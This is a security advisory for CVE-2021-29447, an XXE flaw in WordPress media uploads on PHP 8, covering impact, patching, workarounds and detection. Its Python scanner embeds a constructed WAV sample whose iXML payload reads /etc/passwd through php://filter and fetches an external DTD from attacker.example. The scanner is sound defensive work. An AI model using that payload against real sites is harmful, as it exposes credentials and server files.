CVE-2021-29447

7.1 HIGH
XXE

📋 TL;DR

WordPress users with file upload permissions (like Authors) can exploit an XML parsing flaw in the Media Library: the bundled getID3 library parses XML metadata embedded in uploaded audio files with external entities enabled when WordPress runs on PHP 8, so a crafted upload triggers an XXE attack. A successful attack discloses files readable by the web server process (wp-config.php included) and lets the attacker make server-side requests to internal hosts. Only installations running on PHP 8 are affected; the fix shipped in WordPress 5.7.1.

💻 Affected Systems

Products:
  • WordPress
Versions: Releases before 5.7.1 when running on PHP 8; in practice 5.6.0 through 5.7.0, since 5.6 is the first release with PHP 8 support. The vendor also issued backported minor releases for older branches alongside 5.7.1.
Operating Systems: Any, when the PHP runtime is 8.x
Default Config Vulnerable: ⚠️ Yes
Notes: Only exploitable on PHP 8, where the libxml_disable_entity_loader() protection relied on for earlier PHP versions is deprecated and not applied; PHP 7.x and earlier are not affected. Requires an authenticated user holding the upload_files capability (Author role or higher by default).

📦 What is this software?

WordPress is the open-source PHP content management system that powers a large share of the web. Its Media Library accepts uploads from any account holding the upload_files capability (Author and above by default) and extracts metadata from uploaded audio with the bundled getID3 library, which is where the vulnerable XML parsing lives.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Disclosure of any file readable by the PHP process, including wp-config.php (database credentials and authentication salts), other application secrets and readable system files. Stolen database credentials or reused passwords then turn into full administrative takeover of the site, and the same entity resolution lets the attacker issue server-side requests against internal hosts.

🟠 Likely Case: Read access to wp-config.php and other WordPress files, user data from the database via the disclosed credentials, and any other file the web server account can read.

🟢 If Mitigated: Once patched, a crafted file is just another stored upload. Short of patching, egress filtering defeats the out-of-band DTD fetch the common proof-of-concepts rely on for exfiltration, and strict file permissions limit disclosure to what the PHP process genuinely needs (wp-config.php is necessarily readable to it, so credentials remain at risk).

🌐 Internet-Facing: HIGH - WordPress sites are typically internet-facing and attackers can exploit this if they gain author-level access.
🏢 Internal Only: MEDIUM - Internal WordPress instances could be exploited by malicious insiders or compromised accounts.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account with the upload_files capability (Author or higher by default). Public proof-of-concepts upload a crafted WAV file whose iXML chunk carries the XXE payload; the common variant pulls an external DTD from an attacker-controlled host and exfiltrates file contents read through a php://filter base64 wrapper, so it needs outbound connectivity from the web server. The payload rides inside an audio container that passes WordPress's normal upload type checks.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: WordPress 5.7.1

Vendor Advisory: https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh

Restart Required: No

Instructions:

1. Update WordPress to 5.7.1 or later via Dashboard > Updates. The patch changes the bundled getID3 XML parsing so embedded metadata is no longer parsed with external entities enabled.
2. Sites pinned to an older branch: install the backported minor release the vendor issued for that branch alongside 5.7.1 (the advisory states older affected versions were patched via minor releases).
3. Enable automatic updates for WordPress core so future security releases apply without manual action.

🔧 Temporary Workarounds

Disable PHP 8 (applies to: all)

Run the site on PHP 7.x, which is not affected by this specific XXE issue: ask the hosting provider to switch the site's PHP version to 7.4. Treat this as a stopgap only; PHP 7.4 is itself end-of-life, and the WordPress update is the real fix.

Restrict file uploads (applies to: all)

Remove the upload_files capability (the capability that gates the Media Library) from the Author role, and from Editor if that role is not fully trusted, so that only Administrators can upload. Use a WordPress role management plugin or custom code to modify capabilities.

🧯 If You Can't Patch

  • Blocking XML file types at upload does not help: the payload travels inside an audio container (a WAV with an iXML chunk in the public PoCs) that passes WordPress's normal type checks. Until patched, remove audio types (at minimum wav) from the allowed upload list via the upload_mimes filter, or quarantine audio uploads from non-administrator accounts.
  • Deploy WAF rules that inspect multipart upload bodies to /wp-admin/async-upload.php and the REST endpoint /wp-json/wp/v2/media for <!DOCTYPE and <!ENTITY declarations; the markers sit inside binary audio data, so the rule must scan the whole body rather than only its first bytes.

🔍 How to Verify

Check if Vulnerable:

Check the WordPress version (Dashboard > Updates) and the PHP version (Tools > Site Health > Info, or phpinfo()). If WordPress is older than 5.7.1 and not a patched backport minor release, and PHP is 8.x, the installation is vulnerable. Installations on PHP 7.x are not exposed today but become exposed the moment the host upgrades PHP, so patch them regardless.

Check Version:

wp core version (WP-CLI) or check Dashboard > Updates in WordPress admin

Verify Fix Applied:

Verify the WordPress version is 5.7.1 or higher (or the corresponding backport minor release) via Dashboard > Updates. There is no php.ini switch that disables XXE; the fix lives in WordPress's bundled getID3 code, so additionally confirm that core files are intact and match the release, for example with wp core verify-checksums (WP-CLI).

📡 Detection & Monitoring

Log Indicators:

  • Repeated audio uploads (WAV in particular) from a single Author-level account, especially tiny files or files that yield no usable audio metadata
  • Media uploads from accounts that never previously published media
  • Application or WAF logs showing <!DOCTYPE or <!ENTITY inside multipart upload bodies (web-server access logs do not record request bodies, so this indicator exists only where body logging is enabled)

Network Indicators:

  • POST requests to /wp-admin/async-upload.php or /wp-json/wp/v2/media carrying audio/wav or audio/x-wav parts
  • Outbound HTTP connections from the web server to an unfamiliar host shortly after such an upload (the out-of-band DTD fetch used for exfiltration)

SIEM Query:

source="wordpress.log" AND ("async-upload" OR "upload.php") AND ("DOCTYPE" OR "ENTITY" OR "SYSTEM")

This query only matches where the log source includes request bodies (a ModSecurity audit log or reverse-proxy body logging); ordinary access logs never contain DOCTYPE. For a retrospective check, scan the files already stored under wp-content/uploads instead.
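As an added example (not code from WordPress, getID3 or this page), the following scanner performs that retrospective check and also shows the file shape the public proof-of-concepts described under Exploit Status use: it walks an uploads directory, parses each RIFF container chunk by chunk without trusting the attacker-controlled length fields, and reports any iXML chunk carrying a DOCTYPE, an entity declaration or a SYSTEM/PUBLIC external reference, together with the referenced URI. Assumptions: iXML is the only chunk id treated as XML; the sample WAV bytes, the attacker.example host and evil.dtd name are constructed for the demonstration; the default root wp-content/uploads is a placeholder path.

```python
"""Scan RIFF/WAVE uploads for iXML chunks that declare a DOCTYPE or external
entity, the payload shape public CVE-2021-29447 PoCs hide in a .wav file.

Added example; not WordPress or getID3 code. Sample files below are constructed."""
import os
import re
import struct
import sys

CHUNK_HEADER = struct.Struct("<4sI")   # RIFF chunk header: 4-byte id, little-endian length
XML_CHUNK_IDS = {b"iXML"}              # assumption: the chunk getID3 hands to the XML parser
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\s+(%\s*)?([A-Za-z_:][\w.:-]*)", re.IGNORECASE)
EXTERNAL_RE = re.compile(  # SYSTEM "uri"  or  PUBLIC "pubid" "uri"
    rb"""\b(?:SYSTEM\s+|PUBLIC\s+["'][^"']*["']\s+)["']([^"']+)["']""", re.IGNORECASE)


def iter_riff_chunks(data):
    """Yield (chunk_id, payload) for each top-level chunk of a RIFF container.

    Declared lengths are attacker-controlled, so the RIFF size field is ignored
    and each chunk length is clamped to the bytes actually present."""
    if len(data) < 12 or data[:4] != b"RIFF":
        return
    offset = 12                                  # past "RIFF", size, form type ("WAVE")
    while offset + CHUNK_HEADER.size <= len(data):
        cid, length = CHUNK_HEADER.unpack_from(data, offset)
        offset += CHUNK_HEADER.size
        yield cid, data[offset:offset + length]
        offset += length + (length & 1)          # chunk data is padded to an even length


def scan_riff(data):
    """Return one finding dict per XML-bearing chunk that contains DTD constructs."""
    findings = []
    for cid, payload in iter_riff_chunks(data):
        if cid not in XML_CHUNK_IDS:
            continue
        doctype = DOCTYPE_RE.search(payload) is not None
        entities = [m.group(2).decode("ascii", "replace") for m in ENTITY_RE.finditer(payload)]
        externals = [m.group(1).decode("ascii", "replace") for m in EXTERNAL_RE.finditer(payload)]
        if doctype or entities or externals:
            findings.append({"chunk": cid.decode("ascii"), "doctype": doctype,
                             "entities": entities, "external_refs": externals})
    return findings


def scan_tree(root):
    """Walk an uploads directory (e.g. wp-content/uploads) and map flagged paths to findings.

    Files are selected by the RIFF magic, not by extension, because the extension is
    attacker-chosen; WebP images are also RIFF but carry no iXML chunk and pass clean."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if fh.read(4) != b"RIFF":
                    continue
                fh.seek(0)
                findings = scan_riff(fh.read())
            if findings:
                report[path] = findings
    return report


def build_wav(chunks):
    """Assemble a minimal RIFF/WAVE file from (id, payload) pairs (constructed test data)."""
    body = b"".join(cid + struct.pack("<I", len(p)) + p + (b"\x00" if len(p) & 1 else b"")
                    for cid, p in chunks)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


# Constructed samples: legitimate iXML metadata, the XXE payload shape used against
# getID3 (attacker.example/evil.dtd is a placeholder host), and a file whose declared
# lengths overrun the data that is actually present.
FMT_PCM = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)   # PCM, mono, 8 kHz, 16-bit
BENIGN_WAV = build_wav([
    (b"fmt ", FMT_PCM),
    (b"iXML", b"<?xml version='1.0'?><BWFXML><IXML_VERSION>1.5</IXML_VERSION>"
              b"<PROJECT>podcast</PROJECT></BWFXML>"),
    (b"data", b"\x00" * 16)])
MALICIOUS_WAV = build_wav([
    (b"iXML", b"<?xml version='1.0'?><!DOCTYPE ANY [<!ENTITY % file SYSTEM "
              b"\"php://filter/read=convert.base64-encode/resource=/etc/passwd\">"
              b"<!ENTITY % remote SYSTEM 'http://attacker.example/evil.dtd'>"
              b"%remote;%init;%trick;]>")])
OVERSIZED_WAV = (b"RIFF" + struct.pack("<I", 0xFFFFFFFF) + b"WAVE" + b"iXML"
                 + struct.pack("<I", 0xFFFFFFFF)
                 + b"<!DOCTYPE x [<!ENTITY e SYSTEM 'file:///etc/passwd'>]>")

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "wp-content/uploads"
    for path, findings in scan_tree(root).items():
        print(path, findings)
```

Run it against a copy of wp-content/uploads. A hit whose external_refs points at php://, file:// or a remote host is the XXE payload; an iXML chunk with no DOCTYPE is ordinary metadata written by field recorders and is not a finding. Because the scanner clamps lengths to the bytes present, a file that lies about its chunk size (a common trick to confuse naive parsers) is still scanned to its real end.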
